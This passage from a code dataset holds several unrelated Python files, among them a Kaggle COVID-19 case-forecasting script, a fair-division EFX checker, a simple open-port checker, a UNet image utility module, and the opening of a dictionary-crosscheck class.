len(df_panel[~df_panel.ForecastId.isna()].Date.unique())\n\nprint(\"Train date range:\", str(min_date_train), \" - \", str(max_date_train))\nprint(\"Test date range:\", str(min_date_test), \" - \", str(max_date_test))\n\n# creating lag features\nfor lag in range(1, 41):\n df_panel[f\"lag_{lag}_cc\"] = df_panel.groupby(\"geography\")[\"ConfirmedCases\"].shift(lag)\n df_panel[f\"lag_{lag}_ft\"] = df_panel.groupby(\"geography\")[\"Fatalities\"].shift(lag)\n df_panel[f\"lag_{lag}_rc\"] = df_panel.groupby(\"geography\")[\"Recoveries\"].shift(lag)\n\nfor case in DAYS_SINCE_CASES:\n df_panel = df_panel.merge(df_panel[df_panel.ConfirmedCases >= case].groupby(\"geography\")[\"Date\"].min().reset_index().rename(columns = {\"Date\": f\"case_{case}_date\"}), on = \"geography\", how = \"left\")\n\n\n# %% [code]\n## function for preparing features\ndef prepare_features(df, gap):\n \n df[\"perc_1_ac\"] = (df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap}_rc\"]) / df[f\"lag_{gap}_cc\"]\n df[\"perc_1_cc\"] = df[f\"lag_{gap}_cc\"] / df.population\n \n df[\"diff_1_cc\"] = df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap + 1}_cc\"]\n df[\"diff_2_cc\"] = df[f\"lag_{gap + 1}_cc\"] - df[f\"lag_{gap + 2}_cc\"]\n df[\"diff_3_cc\"] = df[f\"lag_{gap + 2}_cc\"] - df[f\"lag_{gap + 3}_cc\"]\n \n df[\"diff_1_ft\"] = df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap + 1}_ft\"]\n df[\"diff_2_ft\"] = df[f\"lag_{gap + 1}_ft\"] - df[f\"lag_{gap + 2}_ft\"]\n df[\"diff_3_ft\"] = df[f\"lag_{gap + 2}_ft\"] - df[f\"lag_{gap + 3}_ft\"]\n \n df[\"diff_123_cc\"] = (df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap + 3}_cc\"]) / 3\n df[\"diff_123_ft\"] = (df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap + 3}_ft\"]) / 3\n\n df[\"diff_change_1_cc\"] = df.diff_1_cc / df.diff_2_cc\n df[\"diff_change_2_cc\"] = df.diff_2_cc / df.diff_3_cc\n \n df[\"diff_change_1_ft\"] = df.diff_1_ft / df.diff_2_ft\n df[\"diff_change_2_ft\"] = df.diff_2_ft / df.diff_3_ft\n\n df[\"diff_change_12_cc\"] = (df.diff_change_1_cc + df.diff_change_2_cc) / 2\n df[\"diff_change_12_ft\"] = (df.diff_change_1_ft + df.diff_change_2_ft) / 2\n \n df[\"change_1_cc\"] = df[f\"lag_{gap}_cc\"] / df[f\"lag_{gap + 1}_cc\"]\n df[\"change_2_cc\"] = df[f\"lag_{gap + 1}_cc\"] / df[f\"lag_{gap + 2}_cc\"]\n df[\"change_3_cc\"] = df[f\"lag_{gap + 2}_cc\"] / df[f\"lag_{gap + 3}_cc\"]\n\n df[\"change_1_ft\"] = df[f\"lag_{gap}_ft\"] / df[f\"lag_{gap + 1}_ft\"]\n df[\"change_2_ft\"] = df[f\"lag_{gap + 1}_ft\"] / df[f\"lag_{gap + 2}_ft\"]\n df[\"change_3_ft\"] = df[f\"lag_{gap + 2}_ft\"] / df[f\"lag_{gap + 3}_ft\"]\n\n df[\"change_123_cc\"] = df[f\"lag_{gap}_cc\"] / df[f\"lag_{gap + 3}_cc\"]\n df[\"change_123_ft\"] = df[f\"lag_{gap}_ft\"] / df[f\"lag_{gap + 3}_ft\"]\n \n for case in DAYS_SINCE_CASES:\n df[f\"days_since_{case}_case\"] = (df[f\"case_{case}_date\"] - df.Date).astype(\"timedelta64[D]\")\n df.loc[df[f\"days_since_{case}_case\"] < gap, f\"days_since_{case}_case\"] = np.nan\n\n df[\"country_flag\"] = df.Province_State.isna().astype(int)\n df[\"density\"] = df.population / df.area\n \n # target variable is log of change from last known value\n df[\"target_cc\"] = np.log1p(df.ConfirmedCases) - np.log1p(df[f\"lag_{gap}_cc\"])\n df[\"target_ft\"] = np.log1p(df.Fatalities) - np.log1p(df[f\"lag_{gap}_ft\"])\n \n features = [\n f\"lag_{gap}_cc\",\n f\"lag_{gap}_ft\",\n f\"lag_{gap}_rc\",\n \"perc_1_ac\",\n \"perc_1_cc\",\n \"diff_1_cc\",\n \"diff_2_cc\",\n \"diff_3_cc\",\n \"diff_1_ft\",\n \"diff_2_ft\",\n \"diff_3_ft\",\n \"diff_123_cc\",\n \"diff_123_ft\",\n \"diff_change_1_cc\",\n \"diff_change_2_cc\",\n \"diff_change_1_ft\",\n \"diff_change_2_ft\",\n \"diff_change_12_cc\",\n \"diff_change_12_ft\",\n \"change_1_cc\",\n \"change_2_cc\",\n \"change_3_cc\",\n \"change_1_ft\",\n \"change_2_ft\",\n \"change_3_ft\",\n \"change_123_cc\",\n \"change_123_ft\",\n \"days_since_1_case\",\n \"days_since_10_case\",\n \"days_since_50_case\",\n \"days_since_100_case\",\n \"days_since_500_case\",\n \"days_since_1000_case\",\n \"days_since_5000_case\",\n \"days_since_10000_case\",\n \"country_flag\",\n \"lat\",\n \"lon\",\n \"continent\",\n \"population\",\n \"area\",\n \"density\",\n \"target_cc\",\n \"target_ft\"\n ]\n \n return df[features]\n\n\n# %% [markdown]\n# ## LGB Model\n# \n\n# %% [code]\n## function for building and predicting using LGBM model\ndef build_predict_lgbm(df_train, df_test, gap):\n \n df_train.dropna(subset = [\"target_cc\", \"target_ft\", f\"lag_{gap}_cc\", f\"lag_{gap}_ft\"], inplace = True)\n \n target_cc = df_train.target_cc\n target_ft = df_train.target_ft\n \n test_lag_cc = df_test[f\"lag_{gap}_cc\"].values\n test_lag_ft = df_test[f\"lag_{gap}_ft\"].values\n \n df_train.drop([\"target_cc\", \"target_ft\"], axis = 1, inplace = True)\n df_test.drop([\"target_cc\", \"target_ft\"], axis = 1, inplace = True)\n \n categorical_features = [\"continent\"]\n \n dtrain_cc = lgb.Dataset(df_train, label = target_cc, categorical_feature = categorical_features)\n dtrain_ft = lgb.Dataset(df_train, label = target_ft, categorical_feature = categorical_features)\n\n model_cc = lgb.train(LGB_PARAMS, train_set = dtrain_cc, num_boost_round = 200)\n model_ft = lgb.train(LGB_PARAMS, train_set = dtrain_ft, num_boost_round = 200)\n \n # inverse transform from log of change from last known value\n y_pred_cc = np.expm1(model_cc.predict(df_test, num_boost_round = 200) + np.log1p(test_lag_cc))\n y_pred_ft = np.expm1(model_ft.predict(df_test, num_boost_round = 200) + np.log1p(test_lag_ft))\n \n return y_pred_cc, y_pred_ft, model_cc, model_ft\n\n\n# %% [markdown]\n# ## MAD Model\n# \n\n# %% [code]\n## function for predicting moving average decay model\ndef predict_mad(df_test, gap, val = False):\n \n df_test[\"avg_diff_cc\"] = (df_test[f\"lag_{gap}_cc\"] - df_test[f\"lag_{gap + 3}_cc\"]) / 3\n df_test[\"avg_diff_ft\"] = (df_test[f\"lag_{gap}_ft\"] - df_test[f\"lag_{gap + 3}_ft\"]) / 3\n\n if val:\n y_pred_cc = df_test[f\"lag_{gap}_cc\"] + gap * df_test.avg_diff_cc - (1 - MAD_FACTOR) * df_test.avg_diff_cc * np.sum([x for x in range(gap)]) / VAL_DAYS\n y_pred_ft = df_test[f\"lag_{gap}_ft\"] + gap * df_test.avg_diff_ft - (1 - MAD_FACTOR) * df_test.avg_diff_ft * np.sum([x for x in range(gap)]) / VAL_DAYS\n else:\n y_pred_cc = df_test[f\"lag_{gap}_cc\"] + gap * df_test.avg_diff_cc - (1 - MAD_FACTOR) * df_test.avg_diff_cc * np.sum([x for x in range(gap)]) / n_dates_test\n y_pred_ft = df_test[f\"lag_{gap}_ft\"] + gap * df_test.avg_diff_ft - (1 - MAD_FACTOR) * df_test.avg_diff_ft * np.sum([x for x in range(gap)]) / n_dates_test\n\n return y_pred_cc, y_pred_ft\n\n\n# %% [markdown]\n# ## Modelling\n# \n\n# %% [code]\n## building lag x-days models\ndf_train = df_panel[~df_panel.Id.isna()]\ndf_test_full = df_panel[~df_panel.ForecastId.isna()]\n\ndf_preds_val = []\ndf_preds_test = []\n\nfor date in df_test_full.Date.unique():\n \n print(\"Processing date:\", date)\n \n # ignore date already present in train data\n if date in df_train.Date.values:\n df_pred_test = df_test_full.loc[df_test_full.Date == date, [\"ForecastId\", \"ConfirmedCases\", \"Fatalities\"]].rename(columns = {\"ConfirmedCases\": \"ConfirmedCases_test\", \"Fatalities\": \"Fatalities_test\"})\n \n # multiplying predictions by 41 to not look cool on public LB\n df_pred_test.ConfirmedCases_test = df_pred_test.ConfirmedCases_test * 41\n df_pred_test.Fatalities_test = df_pred_test.Fatalities_test * 41\n else:\n df_test = df_test_full[df_test_full.Date == date]\n \n gap = (pd.Timestamp(date) - max_date_train).days\n \n if gap <= VAL_DAYS:\n val_date = max_date_train - pd.Timedelta(VAL_DAYS, \"D\") + pd.Timedelta(gap, \"D\")\n\n df_build = df_train[df_train.Date < val_date]\n df_val = df_train[df_train.Date == val_date]\n \n X_build = prepare_features(df_build, gap)\n X_val = prepare_features(df_val, gap)\n \n y_val_cc_lgb, y_val_ft_lgb, _, _ = build_predict_lgbm(X_build, X_val, gap)\n y_val_cc_mad, y_val_ft_mad = predict_mad(df_val, gap, val = True)\n \n df_pred_val = pd.DataFrame({\"Id\": df_val.Id.values,\n \"ConfirmedCases_val_lgb\": y_val_cc_lgb,\n \"Fatalities_val_lgb\": y_val_ft_lgb,\n \"ConfirmedCases_val_mad\": y_val_cc_mad,\n \"Fatalities_val_mad\": y_val_ft_mad,\n })\n\n df_preds_val.append(df_pred_val)\n\n X_train = prepare_features(df_train, gap)\n X_test = prepare_features(df_test, gap)\n\n y_test_cc_lgb, y_test_ft_lgb, model_cc, model_ft = build_predict_lgbm(X_train, X_test, gap)\n y_test_cc_mad, y_test_ft_mad = predict_mad(df_test, gap)\n \n if gap == 1:\n model_1_cc = model_cc\n model_1_ft = model_ft\n features_1 = X_train.columns.values\n elif gap == 14:\n model_14_cc = model_cc\n model_14_ft = model_ft\n features_14 = X_train.columns.values\n elif gap == 28:\n model_28_cc = model_cc\n model_28_ft = model_ft\n features_28 = X_train.columns.values\n\n df_pred_test = pd.DataFrame({\"ForecastId\": df_test.ForecastId.values,\n \"ConfirmedCases_test_lgb\": y_test_cc_lgb,\n \"Fatalities_test_lgb\": y_test_ft_lgb,\n \"ConfirmedCases_test_mad\": y_test_cc_mad,\n \"Fatalities_test_mad\": y_test_ft_mad,\n })\n \n df_preds_test.append(df_pred_test)\n\n\n# %% [markdown]\n# ## Validation\n# \n\n# %% [code]\n## validation score\ndf_panel = df_panel.merge(pd.concat(df_preds_val, sort = False), on = \"Id\", how = \"left\")\ndf_panel = df_panel.merge(pd.concat(df_preds_test, sort = False), on = \"ForecastId\", how = \"left\")\n\nrmsle_cc_lgb = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.ConfirmedCases_val_lgb.isna()].ConfirmedCases), np.log1p(df_panel[~df_panel.ConfirmedCases_val_lgb.isna()].ConfirmedCases_val_lgb)))\nrmsle_ft_lgb = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.Fatalities_val_lgb.isna()].Fatalities), np.log1p(df_panel[~df_panel.Fatalities_val_lgb.isna()].Fatalities_val_lgb)))\n\nrmsle_cc_mad = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.ConfirmedCases_val_mad.isna()].ConfirmedCases), np.log1p(df_panel[~df_panel.ConfirmedCases_val_mad.isna()].ConfirmedCases_val_mad)))\nrmsle_ft_mad = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.Fatalities_val_mad.isna()].Fatalities), np.log1p(df_panel[~df_panel.Fatalities_val_mad.isna()].Fatalities_val_mad)))\n\nprint(\"LGB CC RMSLE Val of\", VAL_DAYS, \"days for CC:\", round(rmsle_cc_lgb, 2))\nprint(\"LGB FT RMSLE Val of\", VAL_DAYS, \"days for FT:\", round(rmsle_ft_lgb, 2))\nprint(\"LGB Overall RMSLE Val of\", VAL_DAYS, \"days:\", round((rmsle_cc_lgb + rmsle_ft_lgb) / 2, 2))\nprint(\"\\n\")\nprint(\"MAD CC RMSLE Val of\", VAL_DAYS, \"days for CC:\", round(rmsle_cc_mad, 2))\nprint(\"MAD FT RMSLE Val of\", VAL_DAYS, \"days for FT:\", round(rmsle_ft_mad, 2))\nprint(\"MAD Overall RMSLE Val of\", VAL_DAYS, \"days:\", round((rmsle_cc_mad + rmsle_ft_mad) / 2, 2))\n\n\ndf_test = df_panel.loc[~df_panel.ForecastId.isna(), [\"ForecastId\", \"Country_Region\", \"Province_State\", \"Date\",\n \"ConfirmedCases_test\", \"ConfirmedCases_test_lgb\", \"ConfirmedCases_test_mad\",\n \"Fatalities_test\", \"Fatalities_test_lgb\", \"Fatalities_test_mad\"]].reset_index()\n\ndf_test[\"ConfirmedCases\"] = 0.41 * df_test.ConfirmedCases_test_lgb + 0.59 * df_test.ConfirmedCases_test_mad\ndf_test[\"Fatalities\"] = 0.41 * df_test.Fatalities_test_lgb + 0.59 * df_test.Fatalities_test_mad\n\n# Since LGB models don't predict these countries well\ndf_test.loc[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"]), \"ConfirmedCases\"] = df_test[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"])].ConfirmedCases_test_mad.values\ndf_test.loc[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"]), \"Fatalities\"] = df_test[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"])].Fatalities_test_mad.values\n\ndf_test.loc[df_test.Date.isin(df_train.Date.values), \"ConfirmedCases\"] = df_test[df_test.Date.isin(df_train.Date.values)].ConfirmedCases_test.values\ndf_test.loc[df_test.Date.isin(df_train.Date.values), \"Fatalities\"] = df_test[df_test.Date.isin(df_train.Date.values)].Fatalities_test.values\n\ndf_submission = df_test[[\"ForecastId\", \"ConfirmedCases\", \"Fatalities\"]]\ndf_submission.ForecastId = df_submission.ForecastId.astype(int)\n\ndf_submission\n\n\ndf_submission.to_csv(PATH_SUBMISSION, index = False)\ndf_test.to_csv(PATH_OUTPUT, index = False)\n","sub_path":"Testing Kaggle/19/covid19-global-forecasting-week-4/LGB and Model Enrichment.py","file_name":"LGB and Model Enrichment.py","file_ext":"py","file_size_in_byte":16012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"480127760","text":"import random\nfrom itertools import product, combinations\nfrom copy import copy\n\nfrom wolframclient.evaluation import WolframLanguageSession\nfrom wolframclient.language import wl, wlexpr\nsession = WolframLanguageSession()\n\n\n\narrays = []\n\ncomb_behavior = {}\n\ndef pareto_dominates(new_val, old_val):\n\tfailed = False\n\treallyGained = False\n\tfor player in range(players):\n\t\tif new_val[player] < old_val[player]:\n\t\t\tfailed = True\n\t\telif new_val[player] > old_val[player]:\n\t\t\treallyGained = True\n\n\treturn reallyGained and not failed\n\n\nplayers = 3\n\nall_pairs = []\n\nfor comb in combinations([i for i in range(players)], 2):\n\tpair_list = [i for i in comb]\n\tpair_list_r = copy(pair_list)\n\tpair_list_r.reverse()\n\tall_pairs.append(pair_list)\n\tall_pairs.append(pair_list_r)\n\nitems = 6\nall_combs = [item for item in product([i for i in range(players)], repeat=items)]\n\nrandom.shuffle(all_combs)\n\nefx_combs = []\nvaluations = {0: [-1, -0.6875, -0.22916666666666666, -0.16666666666666666, -0.4166666666666667, -0.6041666666666666], 1: [-1, -3.375, -2, -2.625, -0.5, -3.25], 2: [-1, -3, -1, -3.5, -3.625, -3.875]}\n\n\nall_zeros = [0 for j in range(items)]\n\n\nfor comb in all_combs:\n\tall_poss_j = []\n\tisAlreadyJealous = False\n\tfor pair in all_pairs:\n\t\tside1_items = []\n\t\tside2_items = []\n\t\tfor i in range(len(comb)):\n\t\t\tif comb[i] == pair[0]:\n\t\t\t\tside1_items.append(i)\n\t\t\telif comb[i] == pair[1]:\n\t\t\t\tside2_items.append(i)\n\t\tval_side2 = 0\n\t\tfor side2_item in side2_items:\n\t\t\tval_side2 += valuations[pair[0]][side2_item]\n\t\tfor j in range(len(side1_items)):\n\t\t\tval_side1 = 0\n\t\t\tfor side1_item in (side1_items[:j] + side1_items[j+1:]):\n\t\t\t\tval_side1 += valuations[pair[0]][side1_item]\n\n\t\t\tif val_side2 > val_side1:\n\t\t\t\tisAlreadyJealous = True\n\n\n\n\tif isAlreadyJealous == False:\n\t\tefx_combs.append(comb)\n\nefx_valuations = []\nfor comb in efx_combs:\n\tnew_val = []\n\tfor player in range(players):\n\t\tplayer_value = 0\n\t\tfor elem_ind in range(len(comb)):\n\t\t\tif comb[elem_ind] == player:\n\t\t\t\tplayer_value += valuations[player][elem_ind]\n\n\t\tnew_val.append(player_value)\n\tefx_valuations.append([new_val, comb])\n\n#print(efx_valuations)\n#print(efx_combs)\n\nold_efx_valuations = copy(efx_valuations)\n\nprint(\"All EFX Valuations: {}\".format(old_efx_valuations))\nfor comb in all_combs:\n\tnew_val = []\n\tfor player in range(players):\n\t\tplayer_value = 0\n\t\tfor elem_ind in range(len(comb)):\n\t\t\tif comb[elem_ind] == player:\n\t\t\t\tplayer_value += valuations[player][elem_ind]\n\n\t\tnew_val.append(player_value)\n\n\tnew_efx_valuations = []\n\tfor e_val, e_comb in efx_valuations:\n\t\tif not pareto_dominates(new_val, e_val):\n\t\t\tnew_efx_valuations.append([e_val, e_comb])\n\t\t#else:\n\t\t#\tprint(\"EFX comb {} with values {} superseded by {} due to combination {}\".format(e_comb, e_val, new_val, comb))\n\tefx_valuations = new_efx_valuations\n\tif efx_valuations == []:\n\t\tprint(\"REALLY??\")\n\t\timport pdb\n\t\tpdb.set_trace()\nprint(\"EFX+PO Valuations: {}\".format(efx_valuations))\nmax_ev = 0\nev_instance = []\nfor ev in old_efx_valuations:\n\tif sum(ev[0]) > max_ev:\n\t\tmax_ev = sum(ev[0])\n\t\tev_instance = ev\n\nprint(\"MAX {}, {}\".format(max_ev, ev_instance))\n\nimport pdb\npdb.set_trace()\n","sub_path":"efx_chores/check_po_example.py","file_name":"check_po_example.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333081014","text":"#!/usr/bin/env python\n\"\"\"Check if given network ports are open\n\"\"\"\nimport sys\nimport socket\nfrom contextlib import closing\n\ndef check_socket(host, *ports):\n \"\"\"check if given network ports are open\n Args:\n host (str): host address\n ports (int): ports to check\n \"\"\"\n\n result = {'open_ports': [], 'closed_ports': []}\n\n for port in ports:\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:\n if sock.connect_ex((host, int(port))) == 0:\n result['open_ports'].append(port)\n else:\n result['closed_ports'].append(port)\n print (\"open ports: {open_ports}, \"\n \"closed ports: {closed_ports}\".format(**result))\n\n if not result['closed_ports']:\n exit_code = 0\n elif not result['open_ports']:\n exit_code = 2\n else:\n exit_code = 1\n\n sys.exit(exit_code)\n\n\nif __name__ == '__main__':\n check_socket(sys.argv[1], *sys.argv[2:])\n","sub_path":"check_ports.py","file_name":"check_ports.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312561836","text":"# Определить, какое число в массиве встречается чаще всего\n\nimport random\n\n\ndef mostCommonValue(array: list) -> int:\n \"\"\"Выводит какое число в массиве встречается чаще всего\"\"\"\n\n d = dict.fromkeys(array, 0)\n for item in array:\n d[item] += 1\n\n duplicate_key = None\n duplicate_value = 0\n for key, value in d.items():\n if value > duplicate_value:\n duplicate_value = value\n duplicate_key = key\n\n return duplicate_key\n\n\na = [random.randint(0, 10) for _ in range(20)]\nprint(f'Входной массив: {a}')\nprint(f'Чаще всего в массиве встречается число: {mostCommonValue(a)}')\n","sub_path":"Lesson3_Массивы/les3_task4.py","file_name":"les3_task4.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434900092","text":"locs = []\ndirchange = {0:1, 1:0, 2:3, 3:2}\nr, c, m = map(int, input().split())\na = [[[] for _ in range(c)] for _ in range(r)]\nfor _ in range(m):\n r_, c_, s, d, z = map(int, input().split())\n a[r_-1][c_-1].append((z, s, d-1))\n locs.append((r_-1, c_-1))\ndx = [-1, 1, 0, 0]\ndy = [0, 0, 1, -1]\n\ncol = 0\ngot = []\nwhile col= r or ny < 0 or ny >= c:\n dir = dirchange[dir]\n nx, ny = cx+dx[dir], cy+dy[dir]\n cx, cy = nx, ny\n a[cx][cy].append((size, speed, dir))\n tmplocs.append((cx, cy))\n locs = set(tmplocs)\n for x_, y_ in locs:\n if len(a[x_][y_]) >= 2:\n a[x_][y_] = [sorted(a[x_][y_])[-1]]\n col += 1\n\ns = 0\nfor i in range(len(got)):\n s+= got[i][0]\nprint(s)","sub_path":"BeakjoonOJ_Solved/17143_2.py","file_name":"17143_2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485444354","text":"import os\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#import pydensecrf.densecrf as dcrf\r\nfrom PIL import Image\r\nimport torchvision\r\nfrom torchvision import transforms\r\n\r\n\r\n\r\n\r\ndef get_square(img, pos):\r\n \"\"\"Extract a left or a right square from ndarray shape : (H, W, C))\"\"\"\r\n h = img.shape[0]\r\n if pos == 0:\r\n return img[:, :h]\r\n else:\r\n return img[:, -h:]\r\n\r\n\r\ndef split_img_into_squares(img):\r\n return get_square(img, 0), get_square(img, 1)\r\n\r\n\r\ndef hwc_to_chw(img):\r\n return np.transpose(img, axes=[2, 0, 1])\r\n\r\n\r\ndef resize_and_crop(pilimg, scale=1, final_height=None, is_mask=False):\r\n w = pilimg.size[0]\r\n h = pilimg.size[1]\r\n newW = int(w * scale)\r\n newH = int(h * scale)\r\n\r\n if not final_height:\r\n diff = 0\r\n else:\r\n diff = newH - final_height\r\n\r\n if is_mask:\r\n # convert to numpy array, remove alpha channel, convert back to pilimag\r\n # otherwise pilimg resize will make the image transparent (all black)\r\n pilimg = np.array(pilimg)\r\n pilimg = pilimg[:, :, :3] # remove alpha channel\r\n img = Image.fromarray(pilimg)\r\n #pilimg = Image.fromarray(pilimg)\r\n #pilimg = pilimg.resize((newW//8, newH//8))\r\n #img = pilimg.crop((0, 0, newW//8, newH//8))\r\n # img = pilimg.torchvision.transforms.RandomCrop((newW // 8, newH // 8), padding=None, pad_if_needed=False,\r\n # fill=0, padding_mode='constant')\r\n else:\r\n #pilimg = pilimg.resize((newW // 8, newH // 8))\r\n img = pilimg.crop((0, 0, newW // 1, newH // 1))\r\n # img = pilimg.torchvision.transforms.RandomCrop((newW // 8, newH // 8), padding=None, pad_if_needed=False,\r\n # fill=0, padding_mode='constant')\r\n\r\n # plot_img_and_mask(img, img)\r\n # print(is_mask)\r\n # exit(0)\r\n #img = img.crop((0, diff // 2, newW, newH - diff // 2))\r\n return np.array(img, dtype=np.float32)\r\n\r\ndef batch(iterable, batch_size):\r\n \"\"\"Yields lists by batch\"\"\"\r\n b = []\r\n for i, t in enumerate(iterable):\r\n b.append(t)\r\n if (i + 1) % batch_size == 0:\r\n yield b\r\n b = []\r\n\r\n if len(b) > 0:\r\n yield b\r\n\r\ndef split_train_val(dataset, val_percent=0.1):\r\n dataset = list(dataset)\r\n length = len(dataset)\r\n n = int(length * val_percent)\r\n random.shuffle(dataset)\r\n return {'train': dataset[:-n], 'val': dataset[-n:]}\r\n\r\n\r\ndef normalize(x):\r\n return x / 255\r\n\r\n\r\ndef merge_masks(img1, img2, full_w):\r\n h = img1.shape[0]\r\n\r\n new = np.zeros((h, full_w), np.float32)\r\n new[:, :full_w // 2 + 1] = img1[:, :full_w // 2 + 1]\r\n new[:, full_w // 2 + 1:] = img2[:, -(full_w // 2 - 1):]\r\n\r\n return new\r\n\r\n\r\n# credits to https://stackoverflow.com/users/6076729/manuel-lagunas\r\n# def rle_encode(mask_image):\r\n# pixels = mask_image.flatten()\r\n# # We avoid issues with '1' at the start or end (at the corners of\r\n# # the original image) by setting those pixels to '0' explicitly.\r\n# # We do not expect these to be non-zero for an accurate mask,\r\n# # so this should not harm the score.\r\n# pixels[0] = 0\r\n# pixels[-1] = 0\r\n# runs = np.where(pixels[1:] != pixels[:-1])[0] + 2\r\n# runs[1::2] = runs[1::2] - runs[:-1:2]\r\n# return runs\r\n\r\n\r\ndef plot_img_and_mask(img, mask):\r\n fig = plt.figure()\r\n a = fig.add_subplot(1, 2, 1)\r\n a.set_title('Input image')\r\n plt.imshow(img)\r\n\r\n b = fig.add_subplot(1, 2, 2)\r\n b.set_title('Output mask')\r\n plt.imshow(mask)\r\n plt.show()\r\n\r\n\r\n# def dense_crf(img, output_probs):\r\n# h = output_probs.shape[0]\r\n# w = output_probs.shape[1]\r\n#\r\n# output_probs = np.expand_dims(output_probs, 0)\r\n# output_probs = np.append(1 - output_probs, output_probs, axis=0)\r\n#\r\n# d = dcrf.DenseCRF2D(w, h, 2)\r\n# U = -np.log(output_probs)\r\n# U = U.reshape((2, -1))\r\n# U = np.ascontiguousarray(U)\r\n# img = np.ascontiguousarray(img)\r\n#\r\n# d.setUnaryEnergy(U)\r\n#\r\n# d.addPairwiseGaussian(sxy=20, compat=3)\r\n# d.addPairwiseBilateral(sxy=30, srgb=20, rgbim=img, compat=10)\r\n#\r\n# Q = d.inference(5)\r\n# Q = np.argmax(np.array(Q), axis=0).reshape((h, w))\r\n#\r\n# return Q\r\n\r\ndef get_ids(dir):\r\n \"\"\"Returns a list of the ids in the directory\"\"\"\r\n return (f[:-8] for f in os.listdir(dir))\r\n\r\n\r\ndef split_ids(ids, n=2):\r\n \"\"\"Split each id in n, creating n tuples (id, k) for each id\"\"\"\r\n return ((id, i) for id in ids for i in range(n))\r\n\r\n\r\ndef to_cropped_imgs(ids, dir, suffix, scale, is_mask=False):\r\n \"\"\"From a list of tuples, returns the correct cropped img\"\"\"\r\n for id, pos in ids:\r\n im = resize_and_crop(Image.open(dir + id + suffix), scale=scale, is_mask=is_mask)\r\n\r\n if is_mask:\r\n # change to mask 0 or 1, 1 is for billboards\r\n im = im.any(axis=2, keepdims=True).astype(im.dtype)\r\n # import cv2\r\n # cv2.imwrite(\"test.png\", im*255)\r\n\r\n yield get_square(im, pos)\r\n\r\ndef get_imgs_and_masks(ids, dir_img, dir_mask, scale):\r\n \"\"\"Return all the couples (img, mask)\"\"\"\r\n\r\n imgs = to_cropped_imgs(ids, dir_img, '_vis.PNG', scale)\r\n\r\n # need to transform from HWC to CHW\r\n imgs_switched = map(hwc_to_chw, imgs)\r\n imgs_normalized = map(normalize, imgs_switched)\r\n\r\n masks = to_cropped_imgs(ids, dir_mask, '_coords.PNG', scale, is_mask=True)\r\n\r\n\r\n return zip(imgs_normalized, masks)\r\n\r\n\r\n# def get_full_img_and_mask(id, dir_img, dir_mask):\r\n# im = Image.open(dir_img + id + '_vis.PNG')\r\n# mask = Image.open(dir_mask + id + '_coords.PNG')\r\n# return np.array(im), np.array(mask)","sub_path":"with_aug/utils2.py","file_name":"utils2.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249004416","text":"# Name: CrosscheckDictionary.py\n# Version: 1.0.0 \n# Author: Glenn Abastillas\n# Date: February 9, 2016\n# Purpose: Allows the user to:\n# 1.) Check found terms' existence in dictionary (pulled from W0157340 SQL Database)\n# 2.) Add a new column stating whether or not the term was found\n# To see the script run, go to the bottom of this page. \n# - - - - - - - - - - - - -\n\"\"\"\tcompare terms/phrases in Column P [index=15] of a spreadsheet to those in the DICE Dictionary for duplicates.\n\nCrosscheckDictionary compares terms/phrases in question in Column Q [index = 16] of the YYMMDD_HHMM_ling-excerpts-CLIENT-processed_B.tsv spreadsheet (as *.txt) to terms/phrases present in the DICE Dictionary found in the SQL databased in workstation W0157340. \n\nThis class uses the Spreadsheet class to load and initialize the spreadsheet file and the dictionary file for comparison. To compare, the column containing terms in both of these files' spreadsheets are extracted and compared. If there are term matches in the dictionary, \"IN DICT\" is inserted in a newly appended column of the Spreadsheet object. If there is no match, \"NOT IN DICT\" is inserted. \n\"\"\"\nfrom Spreadsheet \t\t import Spreadsheet\n\nimport os\nimport time\n\nclass CrosscheckDictionary(object):\n\n\tEMPTY_CELL = \"EMPTY CELL\"\n\tIN_DICT \t= \"IN DICT\"\n\tNOT_IN_DICT = \"NOT IN DICT\"\n\n\tdef __init__(self, spreadsheetFile, dictionaryFile, spreadsheetIndex = 0, dictionaryIndex = 0):\n\t\t\"\"\"\tinitialize this object by extracting columns from the spreadsheet\n\t\t\tand the dictionary files specified.\n\n\t\t\t@param\tspreadsheetFile\t - path to spreadsheet\n\t\t\t@param\tdictionaryFile\t - path to dictionary\n\t\t\t@param\tspreadsheetIndex - index of columns to be checked\n\t\t\t@param\tdictionaryIndex\t - index of terms to check against\n\t\t\"\"\"\n\t\t# Initialize these variables using the input parameters\n\t\tself.spreadsheet, self.spreadsheetIndex, self.dictionaryIndex = self.open(spreadsheetFile, dictionaryFile, spreadsheetIndex, dictionaryIndex)\n\n\tdef open(self, spreadsheetFile, dictionaryFile, spreadsheetIndex = 0, dictionaryIndex = 0):\n\t\t\"\"\"\topen the spreadsheet file and dictionary file and extract the\n\t\t\tspecified columns for comparison.\n\n\t\t\t@param spreadsheetFile\t- path to spreadsheet file\n\t\t\t@param dictionaryFile\t- path to dictionary file\n\t\t\t@param spreadsheetIndex\t- index of 